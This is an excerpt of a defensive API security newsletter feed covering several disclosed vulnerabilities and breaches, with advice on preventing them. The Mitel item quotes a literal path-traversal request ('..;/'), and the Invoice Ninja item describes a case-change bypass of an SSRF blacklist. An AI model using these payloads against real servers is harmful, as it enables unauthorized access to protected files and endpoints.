<p style="font-weight: 400;"><span style="font-weight: 400;">The first vulnerability involves a path traversal flaw, enabling attackers to manipulate the API path to access internal APIs on the server without authorization. By inserting a directory traversal pattern into the URL, like </span><span style="font-weight: 400;">..;</span><span style="font-weight: 400;"> ,  attackers can redirect the API to an unintended endpoint, exposing sensitive functionality.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The second vulnerability stems from improper input validation in JSON requests. The API accepts malicious commands injected into a </span><span style="font-weight: 400;">name</span><span style="font-weight: 400;"> property, allowing attackers to create a reverse shell to their machine and gain full control of the API server.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These API vulnerabilities could be exploited to fully compromise the Trellix security platform. To mitigate such risks, API developers should strictly define and enforce precise API input paths and property values, reducing the attack surface for these types of exploits.</span></p>
<h2><span style="font-weight: 400;">Breach: Hackers deliver Malware via insecure Aviatrix API</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Another platform with reported API vulnerabilities, the Aviatrix Controller is a widely used platform for managing security and encryption policies across multiple cloud environments. According to one </span><a href="https://www.darkreading.com/cloud-security/cloud-attackers-exploit-max-critical-aviatrix-rce-flaw" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, attackers are already exploiting these vulnerabilities.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Researchers </span><a href="https://www.securing.pl/en/cve-2024-50603-aviatrix-network-controller-command-injection-vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">analyzing</span></a><span style="font-weight: 400;"> the platform&#8217;s code discovered that while many API input parameters were sanitized using the PHP escapeshellarg, some were not, leaving certain APIs exposed. This oversight enabled attackers to inject malicious input into the Aviatrix platform.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In their proof-of-concept, the researchers exploited the unsanitized parameter to send a curl request to the API server. The server processed the unsafe input and inadvertently executed the attacker’s curl request, establishing a callback to the attacker&#8217;s server. This test confirmed that an unauthenticated malicious user could execute arbitrary commands on the Aviatrix Controller through the vulnerable API.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This type of API vulnerability is very similar to the Trellix API vulnerability described earlier. A lack of validation of all input paths and parameters creates opportunities for attackers to exploit APIs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To mitigate these risks, developers should follow best practices for input validation. The </span><a href="https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html" target="_blank" rel="noopener"><span style="font-weight: 400;">OWASP Input Validation Cheat Sheet</span></a><span style="font-weight: 400;"> provides valuable guidance to prevent such vulnerabilities in API code.</span><span style="font-weight: 400;"><br />
</span></p>
<h2><span style="font-weight: 400;">Article: Lessons learned from API misconfigurations</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://nordicapis.com/api-misconfigurations-can-easily-expose-sensitive-data/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on the Nordic APIs website highlights the risks associated with API misconfiguration vulnerabilities, which can lead to serious security breaches.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article provides a list of common misconfigurations that often arise during the API development lifecycle. It also delves into a recent incident involving Microsoft Power Pages, where default roles and access rights created a security vulnerability. This case study underscores the critical importance of addressing misconfiguration bugs.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The OWASP framework also identifies how APIs can be vulnerable to security misconfigurations, such as missing or disabled security controls, exposing sensitive information in error stack trace messages, or forgetting to apply software patches and updates.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some of the </span><a href="https://owasp.org/API-Security/editions/2023/en/0xa8-security-misconfiguration/#how-to-prevent" target="_blank" rel="noopener"><span style="font-weight: 400;">recommended</span></a><span style="font-weight: 400;"> prevention strategies include:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Ensuring all APIs are secured with HTTPS.</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Whitelisting only the HTTP methods that the API is intended to accept and process</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">Restricting error response messages to avoid exposing sensitive information</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">These measures can significantly reduce the likelihood of API-related security incidents.</span><span style="font-weight: 400;"><br />
</span></p>
<h2><span style="font-weight: 400;">Article: Coding practices to remove common API vulnerabilities </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Finally, this </span><a href="https://bitpanic.medium.com/exposing-the-weak-points-vulnerabilities-in-rest-apis-8e4acb4861b0" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> provides a straightforward summary of common REST API vulnerabilities, along with practical guidance on mitigating risks in your APIs. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Vulnerabilities like BOLA (Broken Object Level Authorization), broken authentication, and insufficient input validation are often responsible for API exploits, data breaches, and leaks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">By understanding the root cause of these issues, and implementing the appropriate mitigation measures in the earliest stages of API development, you can proactively eliminate entire classes of vulnerabilities from your codebase.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">You can use this article as a reference to security test your own APIs against common threats.</span></p>
<p>The post <a href="https://apisecurity.io/issue-263-trellix-aviatrix-api-exploits-api-risks-in-education-api-configuration-bugs-secure-coding-practices/">Issue 263: Trellix &#038; Aviatrix API exploits, API risks in education, API configuration bugs &#038; secure coding practices</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 262: API incidents in Invoice Ninja, McDonald&#8217;s &#038; Truecaller apps, Jetbrains survey, Postman data leaks</title>
		<link>https://apisecurity.io/issue-262-api-incidents-in-invoice-ninja-mcdonalds-truecaller-apps-jetbrains-survey-postman-data-leaks/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Fri, 03 Jan 2025 13:16:53 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11267</guid>

					<description><![CDATA[<p>This week, we examine three recent API security incidents, uncovering valuable lessons to help you protect your APIs. We also highlight key insights from Jetbrains’ comprehensive developer survey, and explore an article on how teams inadvertently leak API keys and tokens through their Postman workspaces and what you can do about it.  Breach: Black-listing fails [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-262-api-incidents-in-invoice-ninja-mcdonalds-truecaller-apps-jetbrains-survey-postman-data-leaks/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-262-api-incidents-in-invoice-ninja-mcdonalds-truecaller-apps-jetbrains-survey-postman-data-leaks/">Issue 262: API incidents in Invoice Ninja, McDonald&#8217;s &#038; Truecaller apps, Jetbrains survey, Postman data leaks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we examine three recent API security incidents, uncovering valuable lessons to help you protect your APIs. We also highlight key insights from Jetbrains’ comprehensive developer survey, and explore an article on how teams inadvertently leak API keys and tokens through their Postman workspaces and what you can do about it. </span></p>
<h2><span style="font-weight: 400;">Breach: Black-listing fails to block SSRF attack</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A research team from Pretera has </span><a href="https://www.pretera.com/cve-2024-53353-ssrf-vulnerability-in-invoice-ninja/" target="_blank" rel="noopener"><span style="font-weight: 400;">identified</span></a><span style="font-weight: 400;"> a critical server-side request forgery (SSRF) vulnerability in the popular invoicing software, Invoice Ninja. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The root cause of the issue lies in the use of a blacklisting approach to mitigate such attacks. Specifically, the vulnerable code attempts to identify and strip out malicious strings from user input. For instance, the code aims to block SSRF attempts by detecting patterns like “file://” in user-submitted data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">However, by simply changing the input to use a different case, such as “File://”, researchers successfully bypassed the application’s security measures and executed the attack. This underscores a fundamental weakness of blacklisting: it cannot account for all possible variations of malicious input, making it a flawed and unreliable security mechanism.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I spent some time examining the underlying API traffic behind the Invoice Ninja application, and also found the </span><a href="https://api-docs.invoicing.co/#tag/invoices/POST/api/v1/invoices" target="_blank" rel="noopener"><span style="font-weight: 400;">API documentation</span></a><span style="font-weight: 400;"> online, which includes a schema definition for the API endpoint that processes the vulnerable data. If the API developers tighten the schema to explicitly define and allow only valid and expected data formats, then all other inputs including this SSRF attack could be blocked by default. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This alternative method of input validation (white-listing) significantly reduces the API attack surface, making it much harder for attackers to exploit vulnerabilities like SSRF, SQL injections, and path traversal attacks.</span></p>
<h2><span style="font-weight: 400;">Breach: Unauthorized API access to McNuggets</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">This detailed </span><a href="https://eaton-works.com/2024/12/19/mcdelivery-india-hack/" target="_blank" rel="noopener"><span style="font-weight: 400;">writeup</span></a><span style="font-weight: 400;"> by a security researcher highlights API authorization vulnerabilities discovered in McDonald&#8217;s India’s online delivery system. These vulnerabilities allowed unauthorized users to view and modify the orders of other customers, exposing critical flaws in the API design. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The underlying vulnerabilities, BOLA (Broken Object Level Authorization) and BOPLA (Broken Object-Property Level Authorization) are included in the OWASP API Security Top 10 list.  These vulnerabilities typically arise from poor API security design, where developers fail to verify if a logged-in user has the necessary permissions to access a specific object (e.g. a food order) or to change an object&#8217;s properties (e.g. updating the delivery address or price of an order). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">To prevent such issues, authorization requirements must be explicitly defined and thoroughly documented early in the API development process. Also these requirements should be rigorously tested throughout the API lifecycle to ensure the authorization mechanisms are working as intended.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Fortunately for McDonald&#8217;s, this API vulnerability was ethically reported and fixed before the news got out about the potential for unlimited McNuggets at $0.01 USD!</span></p>
<h2><span style="font-weight: 400;">Vulnerability: URL validation flaw in the Truecaller mobile App</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A bug bounty </span><a href="https://hackerone.com/reports/2493860" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> on HackerOne demonstrates how the Truecaller mobile app was vulnerable to XXS and SSRF attacks due to improper API input validation. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The targeted API was designed to accept a URL as input, making it an attractive target for hackers. By injecting a malicious URL, hackers could manipulate the API to execute unintended actions or expose sensitive data.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this specific case, a security researcher crafted an input by appending a valid URL to a malicious one. The API&#8217;s validation mechanism only checked the valid portion of the input but still processed the malicious segment, leading to the vulnerability.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Similar attack patterns that misuse URL path endings have been observed in other cases. For instance, a </span><a href="https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending" target="_blank" rel="noopener"><span style="font-weight: 400;">reported vulnerability</span></a><span style="font-weight: 400;"> in the Apache Solr platform API allowed attackers to bypass authentication by exploiting poorly validated input.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These incidents underscore the critical need for robust input validation as a cornerstone of API security best practices. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The collaboration between the Truecaller team and the security researcher who reported the vulnerability highlights the value of open communication in identifying and resolving API security issues. Even if you don’t have a formal bug bounty program, it’s essential to provide a clear and accessible channel, such as a dedicated contact page, for ethical reporting of discovered API vulnerabilities. </span></p>
<h2><span style="font-weight: 400;">Industry report: APIs matter to software developers</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">JetBrains recently released their “State of Developer Ecosystem” </span><a href="https://www.jetbrains.com/lp/devecosystem-2024/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;">, providing a comprehensive look at what mattered most to developers in 2024. The survey gathered insights from over 23,000 developers worldwide.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report highlights interesting statistics on developers&#8217; preferred programming languages, the testing methodologies they use, and the growing adoption of AI tools to streamline development tasks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">From an API perspective, the findings reveal that 49% of developers focus on writing code to integrate with APIs and services (API consumers), while 41% develop code to provide APIs and services (API producers). This data underscores the central role APIs play in modern software development.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A notable implication of this trend is the expanding attack surface as developers create and integrate more APIs. Each API serves as a potential entry point for attackers, so developers must take ownership of API security by incorporating best practices during the design and development phases to safeguard their systems.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For those seeking more insights, the</span><a href="https://www.jetbrains.com/lp/devecosystem-2024/#raw-data" target="_blank" rel="noopener"><span style="font-weight: 400;"> raw data</span></a><span style="font-weight: 400;"> from this research is available for download and further analysis.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Improper use of Postman Workspaces</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A research team recently spent a year analyzing publicly accessible Postman workspaces and </span><a href="https://www.cloudsek.com/blog/postman-data-leaks-the-hidden-risks-lurking-in-your-workspaces" target="_blank" rel="noopener"><span style="font-weight: 400;">uncovered</span></a><span style="font-weight: 400;"> over 30,000 instances of leaked sensitive data, including API keys, credentials and access tokens. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We’ve previously covered similar incidents in this newsletter where teams inadvertently leaked private API keys and access tokens on other platforms like </span><a href="https://apisecurity.io/issue-231-api-authentication-bypass-in-ivanti-sentry-docker-images-expose-api-and-keys/" target="_blank" rel="noopener"><span style="font-weight: 400;">DockerHub</span></a><span style="font-weight: 400;">,  </span><a href="https://apisecurity.io/issue-257-internet-archive-under-attack-api-gateways-insecure-by-default-owasp-injection-attacks/" target="_blank" rel="noopener"><span style="font-weight: 400;">Gitlab</span></a><span style="font-weight: 400;"> and </span><a href="https://apisecurity.io/issue-247-dropbox-and-dell-breaches-vulnerability-in-next-js-api-growth-causing-concerns/" target="_blank" rel="noopener"><span style="font-weight: 400;">Dropbox</span></a><span style="font-weight: 400;">. So the issue isn’t so much the platform, but rather the development teams’ insecure practices for handling sensitive API information.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report provides some </span><span style="font-weight: 400;">practical recommendations</span><span style="font-weight: 400;"> to secure your Postman workspaces which should help API teams to improve their security posture and avoid exposing APIs and services to unauthorized access. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Given the prevalence of leaked API data, it’s also recommended for teams to carefully evaluate  the security implications of their chosen API access control methods. API keys and access tokens come with different trade-offs between ease of implementation and the level of security provided. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For example, API keys are often simpler for developers to implement but typically lack expiration dates, leaving APIs more vulnerable to persistent attacks if compromised. In contrast, JWT-based access tokens usually expire automatically, reducing the risk from leaked tokens.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For more information on token management best practices you can read this </span><a style="font-weight: 400;" href="https://42crunch.com/token-management-best-practices/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;">.</span></p>
<p>The post <a href="https://apisecurity.io/issue-262-api-incidents-in-invoice-ninja-mcdonalds-truecaller-apps-jetbrains-survey-postman-data-leaks/">Issue 262: API incidents in Invoice Ninja, McDonald&#8217;s &#038; Truecaller apps, Jetbrains survey, Postman data leaks</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 261: API Security in 2025, OWASP insecure design, path traversal flaws for Mitel and Sailpoint</title>
		<link>https://apisecurity.io/issue-261-api-security-in-2025-owasp-insecure-design-path-traversal-flaws-for-mitel-and-sailpoint/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 19 Dec 2024 11:08:54 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11261</guid>

					<description><![CDATA[<p>This week, we explore the opportunities and challenges in API security as we look ahead to the new year. We also include several newly discovered vulnerabilities and exploits of the embarrassingly common path traversal attack, and a look at OWASP insecure design. Before we dive into this week&#8217;s newsletter, the entire team at APISecurity.io extends [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-261-api-security-in-2025-owasp-insecure-design-path-traversal-flaws-for-mitel-and-sailpoint/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-261-api-security-in-2025-owasp-insecure-design-path-traversal-flaws-for-mitel-and-sailpoint/">Issue 261: API Security in 2025, OWASP insecure design, path traversal flaws for Mitel and Sailpoint</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we explore the opportunities and challenges in API security as we look ahead to the new year. We also include several newly discovered vulnerabilities and exploits of the embarrassingly common path traversal attack, and a look at OWASP insecure design.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Before we dive into this week&#8217;s newsletter, the entire team at APISecurity.io extends our warmest wishes for a successful and fulfilling new year in 2025, both personally and professionally. To those of you taking some well-deserved time off this holiday season, we hope you enjoy a peaceful and restful break, free from API security incidents! Happy New Year!</span></p>
<h2><span style="font-weight: 400;">Article: Why API Security is a top priority for 2025</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A recent </span><a href="https://www.techtarget.com/searchapparchitecture/tip/Whats-next-for-APIs-API-trends" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> on TechTarget explores potential trends shaping the API ecosystem in 2025. Will we see a transformative shift in API development powered by AI-driven services and integrations? Will the adoption of GraphQL and AsyncAPI continue to accelerate? And how might emerging specifications for REST APIs influence development?</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">These evolving trends and technologies will drive the conversations around API security in the coming year. As the article notes, teams still relying on traditional centralized security approaches will find themselves struggling to manage the increasing complexity of API-based integrations and supply chains. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Moreover, with the surge in API breaches reported across critical industries—ranging from finance and telecommunications to healthcare and automotive—the call for </span><a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" target="_blank" rel="noopener"><span style="font-weight: 400;">secure-by-design</span></a><span style="font-weight: 400;">  initiatives is likely to grow louder. This shift will place the responsibility for addressing security vulnerabilities squarely on API producers, alleviating the burden on users and customers.</span></p>
<h2><span style="font-weight: 400;">Article: API Security skills paramount for FinTech in 2025</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In an </span><a href="https://www.siliconrepublic.com/careers/skills-tech-workforce-ai-cybersecurity-leadership-mastercard" target="_blank" rel="noopener"><span style="font-weight: 400;">interview</span></a><span style="font-weight: 400;"> earlier this month, Mastercard’s Olivia Leonard shared her insights on the anticipated technical skills that will be in demand for the financial sector in the coming year.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">As in many other industries, the opportunities and challenges created by AI will be top of mind for organizations in 2025. Leonard highlighted the importance of building a workforce that is “comfortable using AI-powered tools” to stay competitive in the evolving digital landscape. At the same time she also noted that cybersecurity expertise will be paramount due to the rapid expansion of digital payments and services. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Open banking is another trend driving the rapid expansion of digital financial services and is expected to increase the demand for skills in API security. In the UK, organizations such as NatWest have already </span><a href="https://nordicapis.com/banking-on-apis-the-future-of-the-finance-sector/" target="_blank" rel="noopener"><span style="font-weight: 400;">seen the benefits</span></a><span style="font-weight: 400;"> of open banking this year, which will help drive the deployment of more API-based services. Meanwhile in the US, new consumer financial protection rules </span><a href="https://www.forbes.com/sites/ruthfoxeblader/2024/11/20/open-banking-is-finally-coming-to-america/" target="_blank" rel="noopener"><span style="font-weight: 400;">introduced this year</span></a><span style="font-weight: 400;"> create a requirement for open banking and the sharing of financial data through secure and reliable API services.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">All of this comes at a time when APIs are already a prime target for threat actors, which should place a premium on API security skills and expertise. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For technical professionals looking to stay ahead in the financial sector, a worthwhile New Year’s resolution might be to enhance their understanding of API security best practices. </span></p>
<h2><span style="font-weight: 400;">Article: 2025 breach predictions in AI, API, and OpenSource </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Nanhi Singh, General manager of application security at Imperva, shares her </span><a href="https://www.cyberdaily.au/security/11493-op-ed-appsec-2025-battling-genai-exploits-and-strengthening-api-defenses" target="_blank" rel="noopener"><span style="font-weight: 400;">predictions</span></a><span style="font-weight: 400;"> for the major security headlines we can expect in 2025. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A rapidly evolving AI industry brings with it a host of new risks, including prompt injection attacks. It also lowers the barrier to entry for novice hackers, enabling them to execute sophisticated attacks using immensely powerful AI tools.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The article also calls out how a growing reliance on insecure open-source software is likely to trigger a significant incident next year. As software supply chains become increasingly complex, developers are placing greater trust in third-party components, which can be the source of malicious data and attacks.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While APIs are predicted to be a primary attack vector for applications leveraging large language models (LLMs) and will likely continue to attract the attention of hackers, there is a silver lining in the prediction. The heightened risk may drive more teams to adopt a DevSecOps approach, embedding API security practices directly into the development process to address vulnerabilities at their source.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">An interesting article, though a little foreboding in its predictions.</span></p>
<h2><span style="font-weight: 400;">Article: Avoid OWASP insecure design vulnerabilities</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Many API security incidents and vulnerabilities are caused by a relatively small set of root causes. We can often track those causes back to mistakes in API design or implementation.   </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">For example, a common mistake in API design is to assume security checks are performed on the client side, and so failing to enforce those security checks at the API level. We see this regularly in incident reports for mobile apps and single-page applications. It allows hackers to easily circumvent client-side security checks and attack an unprotected API directly. This leads to all manner of vulnerabilities and exploits, including authentication by-pass, escalated privilege and account takeover attacks.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This </span><a href="https://www.hackerone.com/community/owasp-top-10-insecure-design" target="_blank" rel="noopener"><span style="font-weight: 400;">technical article</span></a><span style="font-weight: 400;"> on the Hackerone website delves into more insecure design vulnerabilities. It&#8217;s a very useful educational piece to understand the underlying causes of security breaches, and how adherence to API best practices and principles can help to prevent them. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Private files exposed on Mitel platform </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A vulnerability was discovered in a URL path for Mitel&#8217;s communications platform MiCollab, that allowed arbitrary files to be read from unauthorized parts of the platform.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The path in question (/npm-pwg) was vulnerable to a path traversal attack, which allows an attacker to access other unauthorized paths or directories in the system (e.g. /npm-admin).</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">GET /npm-pwg/..;/npm-admin/ HTTP/1.1</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The researchers who discovered and reported the vulnerability provide an </span><a href="https://labs.watchtowr.com/where-theres-smoke-theres-fire-mitel-micollab-cve-2024-35286-cve-2024-41713-and-an-0day/" target="_blank" rel="noopener"><span style="font-weight: 400;">in-depth technical analysis</span></a><span style="font-weight: 400;">. In it, they describe how using a special sequence of characters in the URL path ..;/ can be used to trick a vulnerable server into traversing out of the proper context and inadvertently giving access to private resources.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Path traversal attacks are similar to other common attacks like SQL injection, whose success depends on APIs that fail to adequately validate user supplied input. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In this case, the vulnerable input was the request path, which should always be carefully validated to ensure an exact match for any exposed endpoint.</span></p>
<h2><span style="font-weight: 400;">Vulnerability: Path Traversal vulnerability in Sailpoint IdentityIQ </span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In another example of a path traversal vulnerability, a recent </span><a href="https://www.theregister.com/2024/12/03/sailpoint_identityiq_vulnerability/" target="_blank" rel="noopener"><span style="font-weight: 400;">report</span></a><span style="font-weight: 400;"> on The Register website describes a bug discovered in Sailpoint’s identity and access management platform IdentityIQ. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The vulnerability received a severity rating of critical 10/10 from the </span><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-10905" target="_blank" rel="noopener"><span style="font-weight: 400;">National Vulnerability Database</span></a><span style="font-weight: 400;"> where it’s described as allowing “HTTP/HTTPS access to static content in the IdentityIQ application directory that should be protected.”</span><span style="font-weight: 400;">The article describes how path traversal vulnerabilities have previously been described as &#8220;unforgivable” and “embarrassingly easy to exploit”. </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;">These incidents serve as a reminder to incorporate recommended security practices into API design to avoid being embarrassed by similar exploits of path traversal vulnerabilities. It&#8217;s also one to watch out for during API security testing.</span></p>
<p>The post <a href="https://apisecurity.io/issue-261-api-security-in-2025-owasp-insecure-design-path-traversal-flaws-for-mitel-and-sailpoint/">Issue 261: API Security in 2025, OWASP insecure design, path traversal flaws for Mitel and Sailpoint</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 260: Attacking the API SDLC, lessons from an API bounty hunter, Node APIs done right and news of recent vulnerabilities</title>
		<link>https://apisecurity.io/issue-260-attacking-the-api-sdlc-lessons-from-an-api-bounty-hunter-node-apis-done-right-and-news-of-recent-vulnerabilities/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 Dec 2024 16:50:06 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11256</guid>

					<description><![CDATA[<p>This week, we focus on raising awareness about API vulnerabilities created by direct attacks against API development teams and tech stacks. We also share articles on safe use of API frameworks, and examine how OWASP API vulnerabilities are uncovered by bounty hunters. Article: How secure is your API SDLC? API teams can produce secure and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-260-attacking-the-api-sdlc-lessons-from-an-api-bounty-hunter-node-apis-done-right-and-news-of-recent-vulnerabilities/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-260-attacking-the-api-sdlc-lessons-from-an-api-bounty-hunter-node-apis-done-right-and-news-of-recent-vulnerabilities/">Issue 260: Attacking the API SDLC, lessons from an API bounty hunter, Node APIs done right and news of recent vulnerabilities</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we focus on raising awareness about API vulnerabilities created by direct attacks against API development teams and tech stacks. We also share articles on safe use of API frameworks, and examine how OWASP API vulnerabilities are uncovered by bounty hunters.</span></p>
<h2><span style="font-weight: 400;">Article: How secure is your API SDLC?</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">API teams can produce secure and reliable APIs through rigorous design, coding and testing. However, this recent </span><a href="https://thenewstack.io/from-contractors-to-oauth-emerging-sdlc-threats-for-2025/" target="_blank" rel="noopener"><span style="font-weight: 400;">article</span></a><span style="font-weight: 400;"> highlights how every phase of API development is now at risk, forcing API teams to take a broader view of API security beyond just the code they produce.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some common sources of SDLC vulnerabilities mentioned include:</span></p>
<ul style="font-weight: 400;">
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">granting excessive access rights to outsourced development teams</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">poorly configured CI/CD pipelines</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">OAuth phishing</span></li>
<li style="font-weight: 400;" aria-level="1"><span style="font-weight: 400;">mismanaged development teams with lax security practices</span></li>
</ul>
<p style="font-weight: 400;"><span style="font-weight: 400;">This means that API security requires a broader perspective and must encompass not only core secure development practices, but also rigorous cybersecurity awareness across the API team and organization. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Malicious API injected in Solana Javascript SDK</span></h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">The Solana JavaScript SDK, a widely used package on NPM with over 350,000 weekly downloads, enables developers to interact with the Solana blockchain via API requests.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">A hacker </span><a href="https://socket.dev/blog/supply-chain-attack-solana-web3-js-library" target="_blank" rel="noopener"><span style="font-weight: 400;">reportedly</span></a><span style="font-weight: 400;"> injected malicious code into the SDK, turning it into a tool for stealing private keys in a classic supply-chain attack. The compromised code allowed the hacker to extract private keys from any application built using the infected SDK and send them to an API endpoint under the hacker&#8217;s control. Possession of a user&#8217;s private keys allows a hacker to drain their digital wallets. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report suggests that the attacker may have compromised the SDK&#8217;s developers through social engineering or phishing tactics, to gain unauthorized access to the package. If true, it demonstrates why API security training should extend from secure coding practices to include general practices for good cyber hygiene. </span></p>
<h2><span style="font-weight: 400;">Vulnerability: Laravel security flaws expose API developers </span></h2>
